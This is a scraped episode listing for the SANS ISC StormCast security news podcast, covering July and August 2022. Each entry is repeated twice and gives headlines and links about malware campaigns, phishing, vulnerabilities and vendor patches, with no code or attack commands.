Two things that will never die: bash scripts and irc https://isc.sans.edu/diary/Two+things+that+will+never+die%3A+bash+scripts+and+IRC%21/28998 Malware using James Webb Telescope images https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/ Malicious Chrome Extensions https://www.mcafee.com/blogs/other-blogs/mcafee-labs/malicious-cookie-stuffing-chrome-extensions-with-1-4-million-users/ Chromium Based Browsers Allow Access to Clipboard https://bugs.chromium.org/p/chromium/issues/detail?id=1334203
8/31/20226 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, August 31st, 2022

Two things that will never die: bash scripts and irc https://isc.sans.edu/diary/Two+things+that+will+never+die%3A+bash+scripts+and+IRC%21/28998 Malware using James Webb Telescope images https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/ Malicious Chrome Extensions https://www.mcafee.com/blogs/other-blogs/mcafee-labs/malicious-cookie-stuffing-chrome-extensions-with-1-4-million-users/ Chromium Based Browsers Allow Access to Clipboard https://bugs.chromium.org/p/chromium/issues/detail?id=1334203
8/31/20226 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, August 30th, 2022

Update: VBA Malcode & UTF7 (APT-C-35) https://isc.sans.edu/diary/Update%3A+VBA+Maldoc+%26+UTF7+%28APT-C-35%29/28994 Twilio Breach used to access 2FA Tokens https://sec.okta.com/scatterswine Popular PDF Reader Adware https://www.malwarebytes.com/blog/news/2022/08/adware-found-on-google-play-pdf-reader-servicing-up-full-screen-ads Google changing its VPN Ad Blocker Policy https://support.google.com/googleplay/android-developer/answer/12253906?hl=en
8/30/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, August 30th, 2022

Update: VBA Malcode & UTF7 (APT-C-35) https://isc.sans.edu/diary/Update%3A+VBA+Maldoc+%26+UTF7+%28APT-C-35%29/28994 Twilio Breach used to access 2FA Tokens https://sec.okta.com/scatterswine Popular PDF Reader Adware https://www.malwarebytes.com/blog/news/2022/08/adware-found-on-google-play-pdf-reader-servicing-up-full-screen-ads Google changing its VPN Ad Blocker Policy https://support.google.com/googleplay/android-developer/answer/12253906?hl=en
8/30/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, August 29th, 2022

Dealing With False Positives when Scanning Memory Dumps for Cobalt Strike Beacons https://isc.sans.edu/diary/Dealing+With+False+Positives+when+Scanning+Memory+Dumps+for+Cobalt+Strike+Beacons/28990 HTTP2 Packet Analysis with Wireshark https://isc.sans.edu/diary/HTTP2+Packet+Analysis+with+Wireshark/28986 Paypal Phishing/Coinbase in One Image https://isc.sans.edu/diary/Paypal+PhishingCoinbase+in+One+Image/28984 Sysinternals Updates: Sysmon v14.0 and ZoomIt v6.01 https://isc.sans.edu/diary/Sysinternals+Updates%3A+Sysmon+v14.0+and+ZoomIt+v6.01/28988 eth.link domain at risk https://www.coindesk.com/tech/2022/08/26/web3-domain-name-service-could-lose-its-web-address-because-programmer-who-can-renew-it-sits-in-jail/
8/29/20226 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, August 29th, 2022

Dealing With False Positives when Scanning Memory Dumps for Cobalt Strike Beacons https://isc.sans.edu/diary/Dealing+With+False+Positives+when+Scanning+Memory+Dumps+for+Cobalt+Strike+Beacons/28990 HTTP2 Packet Analysis with Wireshark https://isc.sans.edu/diary/HTTP2+Packet+Analysis+with+Wireshark/28986 Paypal Phishing/Coinbase in One Image https://isc.sans.edu/diary/Paypal+PhishingCoinbase+in+One+Image/28984 Sysinternals Updates: Sysmon v14.0 and ZoomIt v6.01 https://isc.sans.edu/diary/Sysinternals+Updates%3A+Sysmon+v14.0+and+ZoomIt+v6.01/28988 eth.link domain at risk https://www.coindesk.com/tech/2022/08/26/web3-domain-name-service-could-lose-its-web-address-because-programmer-who-can-renew-it-sits-in-jail/
8/29/20226 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, August 26th, 2022

Taking Apart URL Shorteners https://isc.sans.edu/diary/Taking+Apart+URL+Shorteners/28980 Python Developers Phished for PyPi Credentials https://twitter.com/pypi/status/1562442188285308929 Group IB Connects Twilio and Cloudflare Phishing attacks to others https://www.helpnetsecurity.com/2022/08/25/0ktapus-twilio-cloudflare-phishers-targets/ Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html LastPass Security Incident https://blog.lastpass.com/2022/08/notice-of-recent-security-incident/ Bitbucket Vulnerability https://securityonline.info/cve-2022-36804-bitbucket-server-and-data-center-command-injection-vulnerability/
8/26/20226 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, August 26th, 2022

Taking Apart URL Shorteners https://isc.sans.edu/diary/Taking+Apart+URL+Shorteners/28980 Python Developers Phished for PyPi Credentials https://twitter.com/pypi/status/1562442188285308929 Group IB Connects Twilio and Cloudflare Phishing attacks to others https://www.helpnetsecurity.com/2022/08/25/0ktapus-twilio-cloudflare-phishers-targets/ Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html LastPass Security Incident https://blog.lastpass.com/2022/08/notice-of-recent-security-incident/ Bitbucket Vulnerability https://securityonline.info/cve-2022-36804-bitbucket-server-and-data-center-command-injection-vulnerability/
8/26/20226 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, August 25th, 2022

Monster Libra -> IcedID -> Cobalt Strike and DarkVNC https://isc.sans.edu/forums/diary/VNC/28974/ Is Tox the New C&C Method for Coinminers? https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers Carbon Black Blue Screens https://community.carbonblack.com/t5/Knowledge-Base/Endpoint-Standard-Sudden-Blue-Screens-on-Windows-Devices-23rd/ta-p/114369 Gitlab Vulnerability https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/#Remote%20Command%20Execution%20via%20Github%20import
8/25/20225 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, August 25th, 2022

Monster Libra -> IcedID -> Cobalt Strike and DarkVNC https://isc.sans.edu/forums/diary/VNC/28974/ Is Tox the New C&C Method for Coinminers? https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers Carbon Black Blue Screens https://community.carbonblack.com/t5/Knowledge-Base/Endpoint-Standard-Sudden-Blue-Screens-on-Windows-Devices-23rd/ta-p/114369 Gitlab Vulnerability https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/#Remote%20Command%20Execution%20via%20Github%20import
8/25/20225 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, August 24th, 2022

Who's Looking at Your security.txt File https://isc.sans.edu/diary/Who%27s+Looking+at+Your+security.txt+File%3F/28972 Assessing Python Malware Detectors with a Benchmark Dataset https://blog.chainguard.dev/taming-python-malware-scanners/ New Iranian APT Data Extraction Tool https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/ Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2022-33/ IBM MQ Update https://www.ibm.com/support/pages/node/6613021
8/24/20226 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, August 24th, 2022

Who's Looking at Your security.txt File https://isc.sans.edu/diary/Who%27s+Looking+at+Your+security.txt+File%3F/28972 Assessing Python Malware Detectors with a Benchmark Dataset https://blog.chainguard.dev/taming-python-malware-scanners/ New Iranian APT Data Extraction Tool https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/ Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2022-33/ IBM MQ Update https://www.ibm.com/support/pages/node/6613021
8/24/20226 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, August 23rd, 2022

32 or 64 Bits Malware https://isc.sans.edu/diary/32+or+64+bits+Malware%3F/28968 Proxies and Configurations Used for Credential Stuffing Attacks https://www.ic3.gov/Media/News/2022/220818.pdf DirtyCred Linux Privilege Escalation Vulnerablity https://www.blackhat.com/us-22/briefings/schedule/#cautious-a-new-exploitation-method-no-pipe-but-as-nasty-as-dirty-pipe-27169 Fake DDos Pages on WordPress Sites Lead to Drive-By-Downloads https://blog.sucuri.net/2022/08/fake-ddos-pages-on-wordpress-lead-to-drive-by-downloads.html
8/23/20227 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, August 23rd, 2022

32 or 64 Bits Malware https://isc.sans.edu/diary/32+or+64+bits+Malware%3F/28968 Proxies and Configurations Used for Credential Stuffing Attacks https://www.ic3.gov/Media/News/2022/220818.pdf DirtyCred Linux Privilege Escalation Vulnerablity https://www.blackhat.com/us-22/briefings/schedule/#cautious-a-new-exploitation-method-no-pipe-but-as-nasty-as-dirty-pipe-27169 Fake DDos Pages on WordPress Sites Lead to Drive-By-Downloads https://blog.sucuri.net/2022/08/fake-ddos-pages-on-wordpress-lead-to-drive-by-downloads.html
8/23/20227 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, August 22nd, 2022

Brazil malspam pushes Astaroth (Guildma) malware https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962 Android Ring App XSS https://checkmarx.com/blog/amazon-quickly-fixed-a-vulnerability-in-ring-android-app-that-could-expose-users-camera-recordings/ iOS in App Browser Security Issues https://krausefx.com/blog/announcing-inappbrowsercom-see-what-javascript-commands-get-executed-in-an-in-app-browser iOS in-App Browser Issues https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser https://krausefx.com/blog/announcing-inappbrowsercom-see-what-javascript-commands-get-executed-in-an-in-app-browser
8/22/20225 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, August 22nd, 2022

Brazil malspam pushes Astaroth (Guildma) malware https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962 Android Ring App XSS https://checkmarx.com/blog/amazon-quickly-fixed-a-vulnerability-in-ring-android-app-that-could-expose-users-camera-recordings/ iOS in App Browser Security Issues https://krausefx.com/blog/announcing-inappbrowsercom-see-what-javascript-commands-get-executed-in-an-in-app-browser iOS in-App Browser Issues https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser https://krausefx.com/blog/announcing-inappbrowsercom-see-what-javascript-commands-get-executed-in-an-in-app-browser
8/22/20225 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, August 19th, 2022

Honeypot Attack Summaries with Python https://isc.sans.edu/diary/Honeypot+Attack+Summaries+with+Python/28956 TP-Link Vulnerability https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/ Safari Update https://support.apple.com/en-us/HT213414 iOS VPN Leaks https://www.michaelhorowitz.com/VPNs.on.iOS.are.scam.php Janet Jackson Hard Drive DDoS https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=106994
8/19/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, August 19th, 2022

Honeypot Attack Summaries with Python https://isc.sans.edu/diary/Honeypot+Attack+Summaries+with+Python/28956 TP-Link Vulnerability https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/ Safari Update https://support.apple.com/en-us/HT213414 iOS VPN Leaks https://www.michaelhorowitz.com/VPNs.on.iOS.are.scam.php Janet Jackson Hard Drive DDoS https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=106994
8/19/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, August 18th, 2022

A Quick VoIP Experiment https://isc.sans.edu/diary/A+Quick+VoIP+Experiment/28950 Apple Patches Two Exploited Vulnerabilities https://isc.sans.edu/diary/Apple+Patches+Two+Exploited+Vulnerabilities/28952 Google Chrome Update https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html Cisco staystaystay exploit tool https://www.youtube.com/watch?v=ySgbHClk9HE
8/18/20225 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, August 18th, 2022

A Quick VoIP Experiment https://isc.sans.edu/diary/A+Quick+VoIP+Experiment/28950 Apple Patches Two Exploited Vulnerabilities https://isc.sans.edu/diary/Apple+Patches+Two+Exploited+Vulnerabilities/28952 Google Chrome Update https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html Cisco staystaystay exploit tool https://www.youtube.com/watch?v=ySgbHClk9HE
8/18/20225 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, August 17th, 2022

VBA Maldoc and UTF7 (APT-C-35) https://isc.sans.edu/diary/VBA+Maldoc+%26+UTF7+%28APT-C-35%29/28946 Disrupting SEABORGIUM's Ongoing Phishing Operations https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/ UWB Real Time Location Systems: How Secure Radio Communcations May Fail in Practice.
8/17/20226 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, August 17th, 2022

VBA Maldoc and UTF7 (APT-C-35) https://isc.sans.edu/diary/VBA+Maldoc+%26+UTF7+%28APT-C-35%29/28946 Disrupting SEABORGIUM's Ongoing Phishing Operations https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/ UWB Real Time Location Systems: How Secure Radio Communcations May Fail in Practice.
8/17/20226 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, August 16th, 2022

Realtek CVE-2022-27255 Followup (snort signature and presentation) https://isc.sans.edu/diary/Realtek+SDK+SIP+ALG+Vulnerability%3A+A+Big+Deal%2C+but+not+much+you+can+do+about+it.+CVE+2022-27255/28940 MacOS Privilege Escalation https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/ Zoom Update https://explore.zoom.us/en/trust/security/security-bulletin/ Microsoft Block Vulnerable Bootloaders https://eclypsium.com/2022/08/11/vulnerable-bootloaders-2022/ HPE Integrated Lights Out 5 Vulnerablities https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbhf04333en_us
8/16/20226 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, August 16th, 2022

Realtek CVE-2022-27255 Followup (snort signature and presentation) https://isc.sans.edu/diary/Realtek+SDK+SIP+ALG+Vulnerability%3A+A+Big+Deal%2C+but+not+much+you+can+do+about+it.+CVE+2022-27255/28940 MacOS Privilege Escalation https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/ Zoom Update https://explore.zoom.us/en/trust/security/security-bulletin/ Microsoft Block Vulnerable Bootloaders https://eclypsium.com/2022/08/11/vulnerable-bootloaders-2022/ HPE Integrated Lights Out 5 Vulnerablities https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbhf04333en_us
8/16/20226 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, August 15th, 2022

Realtek eCOS SDK SIP ALG Vulnerability https://isc.sans.edu/diary/Realtek+SDK+SIP+ALG+Vulnerability%3A+A+Big+Deal%2C+but+not+much+you+can+do+about+it.+CVE+2022-27255/28940 Phishing HTML Attachment as Voicemail Audio Transcription https://isc.sans.edu/diary/Phishing+HTML+Attachment+as+Voicemail+Audio+Transcription/28938 CVE-2022-0028 PAN-OS: Reflected Amplification Denial-of-Service Vulnerability https://security.paloaltonetworks.com/CVE-2022-0028
8/15/202211 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, August 15th, 2022

Realtek eCOS SDK SIP ALG Vulnerability https://isc.sans.edu/diary/Realtek+SDK+SIP+ALG+Vulnerability%3A+A+Big+Deal%2C+but+not+much+you+can+do+about+it.+CVE+2022-27255/28940 Phishing HTML Attachment as Voicemail Audio Transcription https://isc.sans.edu/diary/Phishing+HTML+Attachment+as+Voicemail+Audio+Transcription/28938 CVE-2022-0028 PAN-OS: Reflected Amplification Denial-of-Service Vulnerability https://security.paloaltonetworks.com/CVE-2022-0028
8/15/202211 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, August 12th, 2022

InfoStealer Script Based on Curl and NSudo https://isc.sans.edu/diary/InfoStealer+Script+Based+on+Curl+and+NSudo/28932 Cisco Breach Details https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html Ivanti Pulse Connect Secure Privilege Escalation Vulnerability https://gist.github.com/JGarciaSec/2060ec1c8efc1d573a1ddb754c6b4f84 Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software RSA Private Key Leak Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-rsa-key-leak-Ms7UEfZz
8/12/20226 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, August 12th, 2022

InfoStealer Script Based on Curl and NSudo https://isc.sans.edu/diary/InfoStealer+Script+Based+on+Curl+and+NSudo/28932 Cisco Breach Details https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html Ivanti Pulse Connect Secure Privilege Escalation Vulnerability https://gist.github.com/JGarciaSec/2060ec1c8efc1d573a1ddb754c6b4f84 Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software RSA Private Key Leak Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-rsa-key-leak-Ms7UEfZz
8/12/20226 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, August 11th, 2022

And Here They Come Again: DNS Reflection Attacks https://isc.sans.edu/diary/And+Here+They+Come+Again%3A+DNS+Reflection+Attacks/28928 Rapid 7 Defaultinator https://defaultinator.com Zimbra Mass Compromise https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/ VMWare vRealize Vulnerability https://www.vmware.com/security/advisories/VMSA-2022-0022.html Microsoft Vulnerability and IPS/Snort https://community.meraki.com/t5/Meraki-Service-Notices/Microsoft-vulnerability-and-IPS-SNORT/ba-p/156649
8/11/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, August 11th, 2022

And Here They Come Again: DNS Reflection Attacks https://isc.sans.edu/diary/And+Here+They+Come+Again%3A+DNS+Reflection+Attacks/28928 Rapid 7 Defaultinator https://defaultinator.com Zimbra Mass Compromise https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/ VMWare vRealize Vulnerability https://www.vmware.com/security/advisories/VMSA-2022-0022.html Microsoft Vulnerability and IPS/Snort https://community.meraki.com/t5/Meraki-Service-Notices/Microsoft-vulnerability-and-IPS-SNORT/ba-p/156649
8/11/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, August 10th, 2022

Microsoft August 2022 Patch Tuesday https://isc.sans.edu/diary/Microsoft+August+2022+Patch+Tuesday/28924 AEPIC Leak https://aepicleak.com Adobe security bulletins https://helpx.adobe.com/security/security-bulletin.html
8/10/20225 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, August 10th, 2022

Microsoft August 2022 Patch Tuesday https://isc.sans.edu/diary/Microsoft+August+2022+Patch+Tuesday/28924 AEPIC Leak https://aepicleak.com Adobe security bulletins https://helpx.adobe.com/security/security-bulletin.html
8/10/20225 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, August 9th, 2022

JSON All the Logs! https://isc.sans.edu/diary/JSON+All+the+Logs%21/28920 Microsoft Edge Enhanced Security https://docs.microsoft.com/en-us/deployedge/microsoft-edge-security-browse-safer Malicious Python Packages https://www.darkreading.com/application-security/10-malicious-packages-slither-pypi-registry New Orchard Botnet https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/
8/9/20226 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, August 9th, 2022

JSON All the Logs! https://isc.sans.edu/diary/JSON+All+the+Logs%21/28920 Microsoft Edge Enhanced Security https://docs.microsoft.com/en-us/deployedge/microsoft-edge-security-browse-safer Malicious Python Packages https://www.darkreading.com/application-security/10-malicious-packages-slither-pypi-registry New Orchard Botnet https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/
8/9/20226 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, August 8th, 2022

Exim Vulnerability Silently Patched https://github.com/ivd38/exim_overflow DuckDuckGo Stopping Microsoft Tracking Code https://spreadprivacy.com/more-privacy-and-transparency/ Emergency Broadcast Messaging System Vulnerabilities https://content.govdelivery.com/accounts/USDHSFEMA/bulletins/3263326 Slack Leaks Hashed Passwords https://slack.com/intl/en-in/blog/news/notice-about-slack-password-resets Zimbra Flaw Exploited https://nvd.nist.gov/vuln/detail/CVE-2022-27924
8/8/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, August 8th, 2022

Exim Vulnerability Silently Patched https://github.com/ivd38/exim_overflow DuckDuckGo Stopping Microsoft Tracking Code https://spreadprivacy.com/more-privacy-and-transparency/ Emergency Broadcast Messaging System Vulnerabilities https://content.govdelivery.com/accounts/USDHSFEMA/bulletins/3263326 Slack Leaks Hashed Passwords https://slack.com/intl/en-in/blog/news/notice-about-slack-password-resets Zimbra Flaw Exploited https://nvd.nist.gov/vuln/detail/CVE-2022-27924
8/8/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, August 5th, 2022

TLP 2.0 is Here https://isc.sans.edu/diary/TLP+2.0+is+here/28914 Hijacking email with Cloudflare Email Routing https://albertpedersen.com/blog/hijacking-email-with-cloudflare-email-routing/ rsync arbitrary file write vulnerablity https://www.openwall.com/lists/oss-security/2022/08/02/1 Local privilege escalation in Kaspersky VPN https://www.synopsys.com/blogs/software-security/cyrc-advisory-kasperksy-vpn-microsoft-windows/
8/5/20227 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, August 5th, 2022

TLP 2.0 is Here https://isc.sans.edu/diary/TLP+2.0+is+here/28914 Hijacking email with Cloudflare Email Routing https://albertpedersen.com/blog/hijacking-email-with-cloudflare-email-routing/ rsync arbitrary file write vulnerablity https://www.openwall.com/lists/oss-security/2022/08/02/1 Local privilege escalation in Kaspersky VPN https://www.synopsys.com/blogs/software-security/cyrc-advisory-kasperksy-vpn-microsoft-windows/
8/5/20227 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, August 4th, 2022

l9explore and LeakIX Internet Wide Recon Scans https://isc.sans.edu/diary/l9explore+and+LeakIX+Internet+wide+recon+scans./28910 Arris / Arris Variant DSL/Fiber Router Critical Vulnerability http://derekabdine.com/blog/2022-arris-advisory 35,000 Malicious Repo Forks Flood GitHub https://www.bleepingcomputer.com/news/security/35-000-code-repos-not-hacked-but-clones-flood-github-to-serve-malware/ Palo Alto Master Key https://twitter.com/rqu50/status/1554566757704089600#m Laravel Unserialize RCE https://github.com/beicheng-maker/vulns/issues/1 Unuathenticated Remote Code Execution in DrayTek Vigor Routers https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html
8/4/20226 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, August 4th, 2022

l9explore and LeakIX Internet Wide Recon Scans https://isc.sans.edu/diary/l9explore+and+LeakIX+Internet+wide+recon+scans./28910 Arris / Arris Variant DSL/Fiber Router Critical Vulnerability http://derekabdine.com/blog/2022-arris-advisory 35,000 Malicious Repo Forks Flood GitHub https://www.bleepingcomputer.com/news/security/35-000-code-repos-not-hacked-but-clones-flood-github-to-serve-malware/ Palo Alto Master Key https://twitter.com/rqu50/status/1554566757704089600#m Laravel Unserialize RCE https://github.com/beicheng-maker/vulns/issues/1 Unuathenticated Remote Code Execution in DrayTek Vigor Routers https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html
8/4/20226 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, August 3rd, 2022

Increase in Chinese "Hacktivism" Attacks https://isc.sans.edu/diary/Increase+in+Chinese+%22Hacktivism%22+Attacks/28906 Zoho Password Manager Exploit https://xz.aliyun.com/t/11578 VMWare Updates https://www.vmware.com/security/advisories/VMSA-2022-0021.html https://twitter.com/VietPetrus Manjusaka: A Chinese sibling of Sliver and Cobalt Strike https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html
8/3/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, August 3rd, 2022

Increase in Chinese "Hacktivism" Attacks https://isc.sans.edu/diary/Increase+in+Chinese+%22Hacktivism%22+Attacks/28906 Zoho Password Manager Exploit https://xz.aliyun.com/t/11578 VMWare Updates https://www.vmware.com/security/advisories/VMSA-2022-0021.html https://twitter.com/VietPetrus Manjusaka: A Chinese sibling of Sliver and Cobalt Strike https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html
8/3/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, August 2nd, 2022

A Little DDoS in the Morning https://isc.sans.edu/diary/A+Little+DDoS+In+the+Morning/28900 Exposed Twitter API Keys https://cloudsek.com/whitepapers_reports/how-leaked-twitter-api-keys-can-be-used-to-build-a-bot-army/ TCL LinkHub Serialization Issues https://blog.talosintelligence.com/2022/08/vulnerability-spotlight-how-misusing.html Jenkins Plugin Updates https://www.jenkins.io/security/advisory/2022-07-27/
8/2/20226 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, August 2nd, 2022

A Little DDoS in the Morning https://isc.sans.edu/diary/A+Little+DDoS+In+the+Morning/28900 Exposed Twitter API Keys https://cloudsek.com/whitepapers_reports/how-leaked-twitter-api-keys-can-be-used-to-build-a-bot-army/ TCL LinkHub Serialization Issues https://blog.talosintelligence.com/2022/08/vulnerability-spotlight-how-misusing.html Jenkins Plugin Updates https://www.jenkins.io/security/advisory/2022-07-27/
8/2/20226 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, August 1st, 2022

PDF Analysis Introduction and OpenActions Entries https://isc.sans.edu/diary/PDF+Analysis+Intro+and+OpenActions+Entries/28894 IPFS The New Hotbed of Phishing https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/ Mail Stealing Browser Extension https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ Lofylife Malicious NPM Packages https://securelist.com/lofylife-malicious-npm-packages/107014/ IP Camera Vulnerability https://www.nozominetworks.com/blog/vulnerability-in-dahua-s-onvif-implementation-threatens-ip-camera-security/ Nuki Smart Lock Vulnerabilities https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/ Foxit PDF Reader https://www.foxit.com/support/security-bulletins.html
8/1/20228 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, August 1st, 2022

PDF Analysis Introduction and OpenActions Entries https://isc.sans.edu/diary/PDF+Analysis+Intro+and+OpenActions+Entries/28894 IPFS The New Hotbed of Phishing https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/ Mail Stealing Browser Extension https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ Lofylife Malicious NPM Packages https://securelist.com/lofylife-malicious-npm-packages/107014/ IP Camera Vulnerability https://www.nozominetworks.com/blog/vulnerability-in-dahua-s-onvif-implementation-threatens-ip-camera-security/ Nuki Smart Lock Vulnerabilities https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/ Foxit PDF Reader https://www.foxit.com/support/security-bulletins.html
8/1/20228 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, July 29th, 2022

Exfiltrating Data with Bookmarks https://isc.sans.edu/diary/Exfiltrating+Data+With+Bookmarks/28890 Critical Samba Bug Could Let Anyone Become Domain Admin https://nakedsecurity.sophos.com/2022/07/27/critical-samba-bug-could-let-anyone-become-domain-admin-patch-now/ Apple IP Address Range Hijacked by Rostelecom https://www.manrs.org/2022/07/for-12-hours-was-part-of-apple-engineerings-network-hijacked-by-russias-rostelecom/ Veritas Patches https://www.veritas.com/content/support/en_US/security/VTS22-004#c1 IBM Patches https://www.ibm.com/support/pages/node/6606251 https://www.ibm.com/support/pages/node/6607135
7/29/20227 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, July 29th, 2022

Exfiltrating Data with Bookmarks https://isc.sans.edu/diary/Exfiltrating+Data+With+Bookmarks/28890 Critical Samba Bug Could Let Anyone Become Domain Admin https://nakedsecurity.sophos.com/2022/07/27/critical-samba-bug-could-let-anyone-become-domain-admin-patch-now/ Apple IP Address Range Hijacked by Rostelecom https://www.manrs.org/2022/07/for-12-hours-was-part-of-apple-engineerings-network-hijacked-by-russias-rostelecom/ Veritas Patches https://www.veritas.com/content/support/en_US/security/VTS22-004#c1 IBM Patches https://www.ibm.com/support/pages/node/6606251 https://www.ibm.com/support/pages/node/6607135
7/29/20227 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, July 28th, 2022

IcedID (BokBot) with Dark VNC and Cobalt Strike https://isc.sans.edu/diary//28884 Web Assembly Crypto Miners https://blog.sucuri.net/2022/07/cryptominers-webassembly-in-website-malware.html Subzero and Knotweed https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
7/28/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, July 28th, 2022

